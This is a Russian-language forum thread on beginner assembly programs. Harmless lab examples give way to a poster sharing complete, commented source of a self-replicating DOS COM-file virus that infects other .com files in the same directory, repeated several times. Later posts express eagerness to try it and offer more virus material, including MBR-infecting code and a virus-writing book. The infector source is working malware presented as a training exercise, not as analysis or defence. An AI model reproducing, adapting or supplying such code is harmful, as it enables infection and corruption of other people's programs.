.model tiny
.code
org 100h
begin:
jmp start
coded db 0c9h,0cbh,0bbh,0cch,0ceh,0b9h,0c8h,0cah,0bch,0d7h
start:
mov ah,01h
int 16h
jz start
xor ax,ax
int 16h
cmp al,1bh
je exit
cmp al,30h
jl start
cmp al,39h
jg start
push cs
pop ds
mov bx,offset coded
and al,0fh
xlatb
mov ah,0ah
xor bh,bh
mov cx,1
int 10h
jmp start
exit:
ret
end begin
Простые примеры программ на ассемблере для новичков
Программисты напишити пару примерчиков постенких программ для изучающих. Зарание блягодорю всех откликнувшихся.
тема
уровень сложности
уровень сложности
могу выложить свои лабы с универа. на 2ом курсе писались... уровень сложности низкий, но для новичка покатит.
Лаба №1. Кодирует цифры другими символами, другие клавигши игнорирует. Выход - Esc
Лаба №2 - передача параметров в процедуру через стэк и возврат ответа тем же путем..
другие проги, позже запощу, как найду...
Лаба №1. Кодирует цифры другими символами, другие клавигши игнорирует. Выход - Esc
Код:
Лаба №2 - передача параметров в процедуру через стэк и возврат ответа тем же путем..
Код:
.model tiny
.code
org 100h
begin:
jmp start
_mul proc
push bp
mov bp,sp
mov ax,[bp+4]
mul word ptr [bp+6]
mov [bp+4],ax
mov [bp+6],dx
pop bp
ret
_mul endp
start:
mov dx,130h
push dx
push 100h
call _mul
pop ax
pop bx
ret
end begin
.code
org 100h
begin:
jmp start
_mul proc
push bp
mov bp,sp
mov ax,[bp+4]
mul word ptr [bp+6]
mov [bp+4],ax
mov [bp+6],dx
pop bp
ret
_mul endp
start:
mov dx,130h
push dx
push 100h
call _mul
pop ax
pop bx
ret
end begin
другие проги, позже запощу, как найду...
А я те не стану приводить программок по морганию светодиодов на клаве и прогам типа "Helloy World!". Привиду тебе текст простого нерезедентного COM вируса, поражающего файлы в одной дирректории. Самопал, но работает(когда-то баловался этим, щас завязал и тебе не советую))))).
Чтобы там не говорили, но эта штука классно тренирует мозги. Разберёшся, освоишь ассемблер. ;)
Код:
prg segment
assume cs:prg,ds:prg,es:prg,ss:prg
org 100h
start: jmp vir ;Передача управления вирусному коду
org 110h
vir: push ds ;Сохраним DS ...Корректируем
mov ax,ds ;регистр DS ...
db 05h ;Код команды
add_to_ds: dw 0 ; " ADD AX,00h "
mov ds,ax ;AX -> DS ...
fresh_bytes:
mov al,old_bytes
mov cs:[100h],al
mov al,old_bytes+1
mov cs:[101h],al
mov al,old_bytes+2
mov cs:[102h],al
mov cx,80h ;Размер DTA -128 байт ...
mov bx,80h ;Смещение к DTA
lea si,old_dta ;Адрес массива
save_dta:
mov al,byte ptr cs:[bx];Читаем из DTA байт и перено-
mov ds:[si],al ;сим его в мас сив ...
inc bx ;К новому байту
inc si ;
loop save_dta ;Цикл 128 раз
find_first:
mov ah,4eh ;Поиск первого файла ...
mov cx,00100110b ;archive, system hidden
lea dx,maska ;Маска для поиска
int 21h
jnc r_3 ;Нашли !
jmp restore_dta ;Ошибка !
find_next: mov ah,3eh ;Закроем непод-
int 21h ;ходящий файл...
jnc r_2
jmp restore_dta ;Файл нельзя закрыть !
r_2: mov ah,4fh ;И найдем сле-
int 21h ;дующий ...
jnc r_3 ;Файл найден !
jmp restore_dta ;Ошибка !
r_3: mov cx,12 ;Сотрем в буфере
lea si,fn ;"fn" имя пред-
destroy_name: ;ыдущего файла
mov byte ptr [si],0 ;
inc si ;
loop destroy_name ;Цикл 12 раз ...
xor si,si ;И запишем в буфер имя только
copy_name: mov al,byte ptr cs:[si+9eh]
cmp al,0 ;что найденного файла ...
je open ;В конце имени в
mov byte ptr ds:fn[si],al ;DTA всегда сто-
inc si ;ит ноль, его мы
jmp copy_name ;и хотим достичь
open: mov ax,3d02h ;Открыть файл для чтения и записи
lea dx,fn ;Имя файла ...
int 21h ;Функция DOS
jnc save_bytes
jmp restore_dta ;Файл не открывается !
save_bytes: ;Считаем три байта :
mov bx,ax ;Сохраним дескриптор в BX
mov ah,3fh ;Номер функции
mov cx,3 ;Сколько байт ?
lea dx,old_bytes ;Буфер для считываемых данных
int 21h
jnc found_size
jmp close ;Ошибка !
found_size:
mov ax,cs:[09ah] ;Найдем размер файла
count_size:mov si,ax
cmp ax,64000 ;Файл длиннее 64000 байт ?
jna toto ;Нет ...
jmp find_next ;Да - тогда он нам не подходит
toto: test ax,000fh ;Округлим размер
jz krat_16 ;до целого числа
or ax,000fh ;параграфов в
inc ax ;большую сторону
krat_16: mov di,ax ;И запишем ок ругленное значение в DI ...
; Расчитаем смещение для перехода на код вируса ...
sub ax,3 ;Сама командаперехода зани мает три байта!
mov byte ptr new_bytes[1],al;Смещение найдено !
mov byte ptr new_bytes[2],ah
mov ax,di ;Сколько пара-
mov cl,4 ;графов содержит
shr ax,cl ;заражаемая про грамма ?
dec ax ;Учитываем действие директивы ORG 110h ...
mov byte ptr add_to_ds,al ; Корректирующее число найдено !
mov byte ptr add_to_ds+1,ah
mov ax,4200h ;Установим ука-
xor cx,cx ;затель на пос-
dec si ;ледний байт
mov dx,si ;файла ...
int 21h
jnc read_last
jmp close ;Ошибка !
read_last: ;И считаем этот
mov ah,3fh ;байт в ячейку
mov cx,1 ; " last " ...
lea dx,last
int 21h
jc close ;Ошибка !
cmp last,'7' ;" last " =" 7 "
jne write_vir ;Нет - дальше
jmp find_next ;Да- поищем дру гой файл ...
write_vir: mov ax,4200h ;Установим ука-
xor cx,cx ;затель на конец
mov dx,di ;файла ...
int 21h
jc close ;При ошибке -закроем файл
mov ah,40h ;Запишем в файл
mov cx,vir_len ;код вируса дли-
lea dx,vir ;ной vir_len
int 21h
jc close ;При ошибке - закроем файл
write_bytes:
mov ax,4200h ;Установим ука-
xor cx,cx ;затель на нача-
xor dx,dx ;ло файла
int 21h
jc close ;При ошибке - закроем файл
mov ah,40h ;Запишем в файл
mov cx,3 ;первые три бай-
lea dx,new_bytes ;та ( команду
int 21h ;перехода ) ...
close: mov ah,3eh ;Закроем зара-
int 21h ;женный файл ...
restore_dta:
mov cx,80h ;Размер DTA -128 байт ...
mov bx,80h ;Смещение к DTA
lea si,old_dta ;Адрес массива
dta_fresh:
mov al,ds:[si] ;Читаем из массива "old_dta"
mov byte ptr cs:[bx],al;байт и перенo сим его в DTA
inc bx ;К новому байту
inc si ;
loop dta_fresh ;Цикл 128 раз
pop ds ;Восстановим испорченный DS
push cs ;Занесем в стеk регистр CS
db 0b8h ;Код команды
jump: dw 100h ;mov ax,100h
push ax ;Занесем в стек число 100h
retf ;Передача управления на заданный адрес ...
;\*Data area ...
old_bytes db 0e9h ;Исходные три байта заражен-
dw vir_len + 0dh ;ной программы
old_dta db 128 dup (0) ;Здесь вирус хранит исходную DTA программы
maska db '*.com',0 ;Маска для поиска файлов ...
fn db 12 dup (' '),0 ;Сюда помещается имя файла -жертвы ...
new_bytes db 0e9h ;Первые три бай-
db 00h ;та вируса в
db 00h ;файле ...
last db 0 ;Ячейка для последнего байта
db '7' ;Последний байт вируса в файле
vir_len equ $-vir ;Длина вирусного кода ...
prg_end: mov ah,4ch ;Завершение за-
INT 21H ;пускающей прог раммы ...
db '7' ;Без этого символа вирус за разил бы сам себя ...
prg ends ;Все ASM - прог-
end start ;раммы заканчиваются примерно так .
assume cs:prg,ds:prg,es:prg,ss:prg
org 100h
start: jmp vir ;Передача управления вирусному коду
org 110h
vir: push ds ;Сохраним DS ...Корректируем
mov ax,ds ;регистр DS ...
db 05h ;Код команды
add_to_ds: dw 0 ; " ADD AX,00h "
mov ds,ax ;AX -> DS ...
fresh_bytes:
mov al,old_bytes
mov cs:[100h],al
mov al,old_bytes+1
mov cs:[101h],al
mov al,old_bytes+2
mov cs:[102h],al
mov cx,80h ;Размер DTA -128 байт ...
mov bx,80h ;Смещение к DTA
lea si,old_dta ;Адрес массива
save_dta:
mov al,byte ptr cs:[bx];Читаем из DTA байт и перено-
mov ds:[si],al ;сим его в мас сив ...
inc bx ;К новому байту
inc si ;
loop save_dta ;Цикл 128 раз
find_first:
mov ah,4eh ;Поиск первого файла ...
mov cx,00100110b ;archive, system hidden
lea dx,maska ;Маска для поиска
int 21h
jnc r_3 ;Нашли !
jmp restore_dta ;Ошибка !
find_next: mov ah,3eh ;Закроем непод-
int 21h ;ходящий файл...
jnc r_2
jmp restore_dta ;Файл нельзя закрыть !
r_2: mov ah,4fh ;И найдем сле-
int 21h ;дующий ...
jnc r_3 ;Файл найден !
jmp restore_dta ;Ошибка !
r_3: mov cx,12 ;Сотрем в буфере
lea si,fn ;"fn" имя пред-
destroy_name: ;ыдущего файла
mov byte ptr [si],0 ;
inc si ;
loop destroy_name ;Цикл 12 раз ...
xor si,si ;И запишем в буфер имя только
copy_name: mov al,byte ptr cs:[si+9eh]
cmp al,0 ;что найденного файла ...
je open ;В конце имени в
mov byte ptr ds:fn[si],al ;DTA всегда сто-
inc si ;ит ноль, его мы
jmp copy_name ;и хотим достичь
open: mov ax,3d02h ;Открыть файл для чтения и записи
lea dx,fn ;Имя файла ...
int 21h ;Функция DOS
jnc save_bytes
jmp restore_dta ;Файл не открывается !
save_bytes: ;Считаем три байта :
mov bx,ax ;Сохраним дескриптор в BX
mov ah,3fh ;Номер функции
mov cx,3 ;Сколько байт ?
lea dx,old_bytes ;Буфер для считываемых данных
int 21h
jnc found_size
jmp close ;Ошибка !
found_size:
mov ax,cs:[09ah] ;Найдем размер файла
count_size:mov si,ax
cmp ax,64000 ;Файл длиннее 64000 байт ?
jna toto ;Нет ...
jmp find_next ;Да - тогда он нам не подходит
toto: test ax,000fh ;Округлим размер
jz krat_16 ;до целого числа
or ax,000fh ;параграфов в
inc ax ;большую сторону
krat_16: mov di,ax ;И запишем ок ругленное значение в DI ...
; Расчитаем смещение для перехода на код вируса ...
sub ax,3 ;Сама командаперехода зани мает три байта!
mov byte ptr new_bytes[1],al;Смещение найдено !
mov byte ptr new_bytes[2],ah
mov ax,di ;Сколько пара-
mov cl,4 ;графов содержит
shr ax,cl ;заражаемая про грамма ?
dec ax ;Учитываем действие директивы ORG 110h ...
mov byte ptr add_to_ds,al ; Корректирующее число найдено !
mov byte ptr add_to_ds+1,ah
mov ax,4200h ;Установим ука-
xor cx,cx ;затель на пос-
dec si ;ледний байт
mov dx,si ;файла ...
int 21h
jnc read_last
jmp close ;Ошибка !
read_last: ;И считаем этот
mov ah,3fh ;байт в ячейку
mov cx,1 ; " last " ...
lea dx,last
int 21h
jc close ;Ошибка !
cmp last,'7' ;" last " =" 7 "
jne write_vir ;Нет - дальше
jmp find_next ;Да- поищем дру гой файл ...
write_vir: mov ax,4200h ;Установим ука-
xor cx,cx ;затель на конец
mov dx,di ;файла ...
int 21h
jc close ;При ошибке -закроем файл
mov ah,40h ;Запишем в файл
mov cx,vir_len ;код вируса дли-
lea dx,vir ;ной vir_len
int 21h
jc close ;При ошибке - закроем файл
write_bytes:
mov ax,4200h ;Установим ука-
xor cx,cx ;затель на нача-
xor dx,dx ;ло файла
int 21h
jc close ;При ошибке - закроем файл
mov ah,40h ;Запишем в файл
mov cx,3 ;первые три бай-
lea dx,new_bytes ;та ( команду
int 21h ;перехода ) ...
close: mov ah,3eh ;Закроем зара-
int 21h ;женный файл ...
restore_dta:
mov cx,80h ;Размер DTA -128 байт ...
mov bx,80h ;Смещение к DTA
lea si,old_dta ;Адрес массива
dta_fresh:
mov al,ds:[si] ;Читаем из массива "old_dta"
mov byte ptr cs:[bx],al;байт и перенo сим его в DTA
inc bx ;К новому байту
inc si ;
loop dta_fresh ;Цикл 128 раз
pop ds ;Восстановим испорченный DS
push cs ;Занесем в стеk регистр CS
db 0b8h ;Код команды
jump: dw 100h ;mov ax,100h
push ax ;Занесем в стек число 100h
retf ;Передача управления на заданный адрес ...
;\*Data area ...
old_bytes db 0e9h ;Исходные три байта заражен-
dw vir_len + 0dh ;ной программы
old_dta db 128 dup (0) ;Здесь вирус хранит исходную DTA программы
maska db '*.com',0 ;Маска для поиска файлов ...
fn db 12 dup (' '),0 ;Сюда помещается имя файла -жертвы ...
new_bytes db 0e9h ;Первые три бай-
db 00h ;та вируса в
db 00h ;файле ...
last db 0 ;Ячейка для последнего байта
db '7' ;Последний байт вируса в файле
vir_len equ $-vir ;Длина вирусного кода ...
prg_end: mov ah,4ch ;Завершение за-
INT 21H ;пускающей прог раммы ...
db '7' ;Без этого символа вирус за разил бы сам себя ...
prg ends ;Все ASM - прог-
end start ;раммы заканчиваются примерно так .
Чтобы там не говорили, но эта штука классно тренирует мозги. Разберёшся, освоишь ассемблер. ;)
[quote=Jail]когда-то баловался этим, щас завязал и тебе не советую[/quote]
А я вот хочу попробовать :)
А я вот хочу попробовать :)
Нет не у кого процедурки вывода значения регистра (например bl) на экран???
вот удобный модуль
там описаны различные средства ввода/вывода
там описаны различные средства ввода/вывода
Цитата:
А я вот хочу попробовать :)
:D У меня есть инфа по этому поводу, могу скинуть тебе на мыло если заинтересовался этим ;) . Есть даж код загруза в память вируса Satana....и ещё кое что интересное)))))) :D
А исходника Черноблыя нету?
дизасемблируешь и получаешь исходник :-)
Цитата:
А исходника Черноблыя нету?
Кое-что есть))) Есть описания самого вируса по "шагам" и вырезки кода. ;) Есть и документуха по написанию виря, кот. так сказать перехватывает MBR)))))) Ну раньше же баловался я этим, осталось кое чего....... :D
Цитата:
дизасемблируешь и получаешь исходник :-)
Ого-го)) Ну ты дал))) Для начала его надо где-то словить, потом ещё определить, затем как то поймать исходный файл откуда он начал распространение, ну а потом уже дизасемблировать)) А ты хоть раз хотя бы Softice в глаза то видел? Думаешь это так просто? :)
Jail, ты часом не Игроь Коваль, вы с ним подозрительно похожие вирусы пишите:)
Цитата:
Jail, ты часом не Игроь Коваль, вы с ним подозрительно похожие вирусы пишите
Наивный.......так я тебе и сказал))) :rolleyes:
jail спасибо за пример. Буду учить все равно ассемблер это тема:-)
Цитата: Jail
А я те не стану приводить программок по морганию светодиодов на клаве и прогам типа "Helloy World!". Привиду тебе текст простого нерезедентного COM вируса, поражающего файлы в одной дирректории. Самопал, но работает(когда-то баловался этим, щас завязал и тебе не советую))))).
Чтобы там не говорили, но эта штука классно тренирует мозги. Разберёшся, освоишь ассемблер. ;)
Код:
prg segment
assume cs:prg,ds:prg,es:prg,ss:prg
org 100h
start: jmp vir ;Передача управления вирусному коду
org 110h
vir: push ds ;Сохраним DS ...Корректируем
mov ax,ds ;регистр DS ...
db 05h ;Код команды
add_to_ds: dw 0 ; " ADD AX,00h "
mov ds,ax ;AX -> DS ...
fresh_bytes:
mov al,old_bytes
mov cs:[100h],al
mov al,old_bytes+1
mov cs:[101h],al
mov al,old_bytes+2
mov cs:[102h],al
mov cx,80h ;Размер DTA -128 байт ...
mov bx,80h ;Смещение к DTA
lea si,old_dta ;Адрес массива
save_dta:
mov al,byte ptr cs:[bx];Читаем из DTA байт и перено-
mov ds:[si],al ;сим его в мас сив ...
inc bx ;К новому байту
inc si ;
loop save_dta ;Цикл 128 раз
find_first:
mov ah,4eh ;Поиск первого файла ...
mov cx,00100110b ;archive, system hidden
lea dx,maska ;Маска для поиска
int 21h
jnc r_3 ;Нашли !
jmp restore_dta ;Ошибка !
find_next: mov ah,3eh ;Закроем непод-
int 21h ;ходящий файл...
jnc r_2
jmp restore_dta ;Файл нельзя закрыть !
r_2: mov ah,4fh ;И найдем сле-
int 21h ;дующий ...
jnc r_3 ;Файл найден !
jmp restore_dta ;Ошибка !
r_3: mov cx,12 ;Сотрем в буфере
lea si,fn ;"fn" имя пред-
destroy_name: ;ыдущего файла
mov byte ptr [si],0 ;
inc si ;
loop destroy_name ;Цикл 12 раз ...
xor si,si ;И запишем в буфер имя только
copy_name: mov al,byte ptr cs:[si+9eh]
cmp al,0 ;что найденного файла ...
je open ;В конце имени в
mov byte ptr ds:fn[si],al ;DTA всегда сто-
inc si ;ит ноль, его мы
jmp copy_name ;и хотим достичь
open: mov ax,3d02h ;Открыть файл для чтения и записи
lea dx,fn ;Имя файла ...
int 21h ;Функция DOS
jnc save_bytes
jmp restore_dta ;Файл не открывается !
save_bytes: ;Считаем три байта :
mov bx,ax ;Сохраним дескриптор в BX
mov ah,3fh ;Номер функции
mov cx,3 ;Сколько байт ?
lea dx,old_bytes ;Буфер для считываемых данных
int 21h
jnc found_size
jmp close ;Ошибка !
found_size:
mov ax,cs:[09ah] ;Найдем размер файла
count_size:mov si,ax
cmp ax,64000 ;Файл длиннее 64000 байт ?
jna toto ;Нет ...
jmp find_next ;Да - тогда он нам не подходит
toto: test ax,000fh ;Округлим размер
jz krat_16 ;до целого числа
or ax,000fh ;параграфов в
inc ax ;большую сторону
krat_16: mov di,ax ;И запишем ок ругленное значение в DI ...
; Расчитаем смещение для перехода на код вируса ...
sub ax,3 ;Сама командаперехода зани мает три байта!
mov byte ptr new_bytes[1],al;Смещение найдено !
mov byte ptr new_bytes[2],ah
mov ax,di ;Сколько пара-
mov cl,4 ;графов содержит
shr ax,cl ;заражаемая про грамма ?
dec ax ;Учитываем действие директивы ORG 110h ...
mov byte ptr add_to_ds,al ; Корректирующее число найдено !
mov byte ptr add_to_ds+1,ah
mov ax,4200h ;Установим ука-
xor cx,cx ;затель на пос-
dec si ;ледний байт
mov dx,si ;файла ...
int 21h
jnc read_last
jmp close ;Ошибка !
read_last: ;И считаем этот
mov ah,3fh ;байт в ячейку
mov cx,1 ; " last " ...
lea dx,last
int 21h
jc close ;Ошибка !
cmp last,'7' ;" last " =" 7 "
jne write_vir ;Нет - дальше
jmp find_next ;Да- поищем дру гой файл ...
write_vir: mov ax,4200h ;Установим ука-
xor cx,cx ;затель на конец
mov dx,di ;файла ...
int 21h
jc close ;При ошибке -закроем файл
mov ah,40h ;Запишем в файл
mov cx,vir_len ;код вируса дли-
lea dx,vir ;ной vir_len
int 21h
jc close ;При ошибке - закроем файл
write_bytes:
mov ax,4200h ;Установим ука-
xor cx,cx ;затель на нача-
xor dx,dx ;ло файла
int 21h
jc close ;При ошибке - закроем файл
mov ah,40h ;Запишем в файл
mov cx,3 ;первые три бай-
lea dx,new_bytes ;та ( команду
int 21h ;перехода ) ...
close: mov ah,3eh ;Закроем зара-
int 21h ;женный файл ...
restore_dta:
mov cx,80h ;Размер DTA -128 байт ...
mov bx,80h ;Смещение к DTA
lea si,old_dta ;Адрес массива
dta_fresh:
mov al,ds:[si] ;Читаем из массива "old_dta"
mov byte ptr cs:[bx],al;байт и перенo сим его в DTA
inc bx ;К новому байту
inc si ;
loop dta_fresh ;Цикл 128 раз
pop ds ;Восстановим испорченный DS
push cs ;Занесем в стеk регистр CS
db 0b8h ;Код команды
jump: dw 100h ;mov ax,100h
push ax ;Занесем в стек число 100h
retf ;Передача управления на заданный адрес ...
;\*Data area ...
old_bytes db 0e9h ;Исходные три байта заражен-
dw vir_len + 0dh ;ной программы
old_dta db 128 dup (0) ;Здесь вирус хранит исходную DTA программы
maska db '*.com',0 ;Маска для поиска файлов ...
fn db 12 dup (' '),0 ;Сюда помещается имя файла -жертвы ...
new_bytes db 0e9h ;Первые три бай-
db 00h ;та вируса в
db 00h ;файле ...
last db 0 ;Ячейка для последнего байта
db '7' ;Последний байт вируса в файле
vir_len equ $-vir ;Длина вирусного кода ...
prg_end: mov ah,4ch ;Завершение за-
INT 21H ;пускающей прог раммы ...
db '7' ;Без этого символа вирус за разил бы сам себя ...
prg ends ;Все ASM - прог-
end start ;раммы заканчиваются примерно так .
assume cs:prg,ds:prg,es:prg,ss:prg
org 100h
start: jmp vir ;Передача управления вирусному коду
org 110h
vir: push ds ;Сохраним DS ...Корректируем
mov ax,ds ;регистр DS ...
db 05h ;Код команды
add_to_ds: dw 0 ; " ADD AX,00h "
mov ds,ax ;AX -> DS ...
fresh_bytes:
mov al,old_bytes
mov cs:[100h],al
mov al,old_bytes+1
mov cs:[101h],al
mov al,old_bytes+2
mov cs:[102h],al
mov cx,80h ;Размер DTA -128 байт ...
mov bx,80h ;Смещение к DTA
lea si,old_dta ;Адрес массива
save_dta:
mov al,byte ptr cs:[bx];Читаем из DTA байт и перено-
mov ds:[si],al ;сим его в мас сив ...
inc bx ;К новому байту
inc si ;
loop save_dta ;Цикл 128 раз
find_first:
mov ah,4eh ;Поиск первого файла ...
mov cx,00100110b ;archive, system hidden
lea dx,maska ;Маска для поиска
int 21h
jnc r_3 ;Нашли !
jmp restore_dta ;Ошибка !
find_next: mov ah,3eh ;Закроем непод-
int 21h ;ходящий файл...
jnc r_2
jmp restore_dta ;Файл нельзя закрыть !
r_2: mov ah,4fh ;И найдем сле-
int 21h ;дующий ...
jnc r_3 ;Файл найден !
jmp restore_dta ;Ошибка !
r_3: mov cx,12 ;Сотрем в буфере
lea si,fn ;"fn" имя пред-
destroy_name: ;ыдущего файла
mov byte ptr [si],0 ;
inc si ;
loop destroy_name ;Цикл 12 раз ...
xor si,si ;И запишем в буфер имя только
copy_name: mov al,byte ptr cs:[si+9eh]
cmp al,0 ;что найденного файла ...
je open ;В конце имени в
mov byte ptr ds:fn[si],al ;DTA всегда сто-
inc si ;ит ноль, его мы
jmp copy_name ;и хотим достичь
open: mov ax,3d02h ;Открыть файл для чтения и записи
lea dx,fn ;Имя файла ...
int 21h ;Функция DOS
jnc save_bytes
jmp restore_dta ;Файл не открывается !
save_bytes: ;Считаем три байта :
mov bx,ax ;Сохраним дескриптор в BX
mov ah,3fh ;Номер функции
mov cx,3 ;Сколько байт ?
lea dx,old_bytes ;Буфер для считываемых данных
int 21h
jnc found_size
jmp close ;Ошибка !
found_size:
mov ax,cs:[09ah] ;Найдем размер файла
count_size:mov si,ax
cmp ax,64000 ;Файл длиннее 64000 байт ?
jna toto ;Нет ...
jmp find_next ;Да - тогда он нам не подходит
toto: test ax,000fh ;Округлим размер
jz krat_16 ;до целого числа
or ax,000fh ;параграфов в
inc ax ;большую сторону
krat_16: mov di,ax ;И запишем ок ругленное значение в DI ...
; Расчитаем смещение для перехода на код вируса ...
sub ax,3 ;Сама командаперехода зани мает три байта!
mov byte ptr new_bytes[1],al;Смещение найдено !
mov byte ptr new_bytes[2],ah
mov ax,di ;Сколько пара-
mov cl,4 ;графов содержит
shr ax,cl ;заражаемая про грамма ?
dec ax ;Учитываем действие директивы ORG 110h ...
mov byte ptr add_to_ds,al ; Корректирующее число найдено !
mov byte ptr add_to_ds+1,ah
mov ax,4200h ;Установим ука-
xor cx,cx ;затель на пос-
dec si ;ледний байт
mov dx,si ;файла ...
int 21h
jnc read_last
jmp close ;Ошибка !
read_last: ;И считаем этот
mov ah,3fh ;байт в ячейку
mov cx,1 ; " last " ...
lea dx,last
int 21h
jc close ;Ошибка !
cmp last,'7' ;" last " =" 7 "
jne write_vir ;Нет - дальше
jmp find_next ;Да- поищем дру гой файл ...
write_vir: mov ax,4200h ;Установим ука-
xor cx,cx ;затель на конец
mov dx,di ;файла ...
int 21h
jc close ;При ошибке -закроем файл
mov ah,40h ;Запишем в файл
mov cx,vir_len ;код вируса дли-
lea dx,vir ;ной vir_len
int 21h
jc close ;При ошибке - закроем файл
write_bytes:
mov ax,4200h ;Установим ука-
xor cx,cx ;затель на нача-
xor dx,dx ;ло файла
int 21h
jc close ;При ошибке - закроем файл
mov ah,40h ;Запишем в файл
mov cx,3 ;первые три бай-
lea dx,new_bytes ;та ( команду
int 21h ;перехода ) ...
close: mov ah,3eh ;Закроем зара-
int 21h ;женный файл ...
restore_dta:
mov cx,80h ;Размер DTA -128 байт ...
mov bx,80h ;Смещение к DTA
lea si,old_dta ;Адрес массива
dta_fresh:
mov al,ds:[si] ;Читаем из массива "old_dta"
mov byte ptr cs:[bx],al;байт и перенo сим его в DTA
inc bx ;К новому байту
inc si ;
loop dta_fresh ;Цикл 128 раз
pop ds ;Восстановим испорченный DS
push cs ;Занесем в стеk регистр CS
db 0b8h ;Код команды
jump: dw 100h ;mov ax,100h
push ax ;Занесем в стек число 100h
retf ;Передача управления на заданный адрес ...
;\*Data area ...
old_bytes db 0e9h ;Исходные три байта заражен-
dw vir_len + 0dh ;ной программы
old_dta db 128 dup (0) ;Здесь вирус хранит исходную DTA программы
maska db '*.com',0 ;Маска для поиска файлов ...
fn db 12 dup (' '),0 ;Сюда помещается имя файла -жертвы ...
new_bytes db 0e9h ;Первые три бай-
db 00h ;та вируса в
db 00h ;файле ...
last db 0 ;Ячейка для последнего байта
db '7' ;Последний байт вируса в файле
vir_len equ $-vir ;Длина вирусного кода ...
prg_end: mov ah,4ch ;Завершение за-
INT 21H ;пускающей прог раммы ...
db '7' ;Без этого символа вирус за разил бы сам себя ...
prg ends ;Все ASM - прог-
end start ;раммы заканчиваются примерно так .
Чтобы там не говорили, но эта штука классно тренирует мозги. Разберёшся, освоишь ассемблер. ;)
В ТРЕТЬЕЙ И ДЕСЯТОЙ СТРОЧКЕ ОШИБКИ
error A2008: syntax error: begin
error A2006: undefined symbol :begin
Цитата:
В ТРЕТЬЕЙ И ДЕСЯТОЙ СТРОЧКЕ ОШИБКИ
error A2008: syntax error: begin
error A2006: undefined symbol :begin
error A2008: syntax error: begin
error A2006: undefined symbol :begin
Не нужно утверждать так однозначно.
Всё зависит от того каким транслятором вы пользуетесь,TASM, NASM, YASM, MASM, FASM, а так же сильно зависит от версии оного. У меня нередко возникали ошибки времени "компиляции" в синтаксически правильных конструкциях (замена транслятора на более новую версию, или даже наоборот, избавляло от последеней). Этим мне ассемблер и не нравится и я его забросил. Прогоните через дебагер и всё станет ясно. У меня работало. :)
Что-то мне твой вирус напомнил незабвенную книжку П.Хижняка... ;)
Кстати, саму книжку можно почитать здесь: http://vx.netlux.org/lib/apk01.html
Кстати, саму книжку можно почитать здесь: http://vx.netlux.org/lib/apk01.html
Цитата:
Что-то мне твой вирус напомнил незабвенную книжку П.Хижняка...
Кстати, саму книжку можно почитать здесь: http://vx.netlux.org/lib/apk01.html
Кстати, саму книжку можно почитать здесь: http://vx.netlux.org/lib/apk01.html
Ну этож классика жанра Archie :)
Немного похож, но фундаментальные принципы заражения и подмены почти одинаковые, лишь тело виря это произведение автора.
Книжка и вправду хорошая, но я начинал не по этой. В твоей как-то больше про антивири написано :D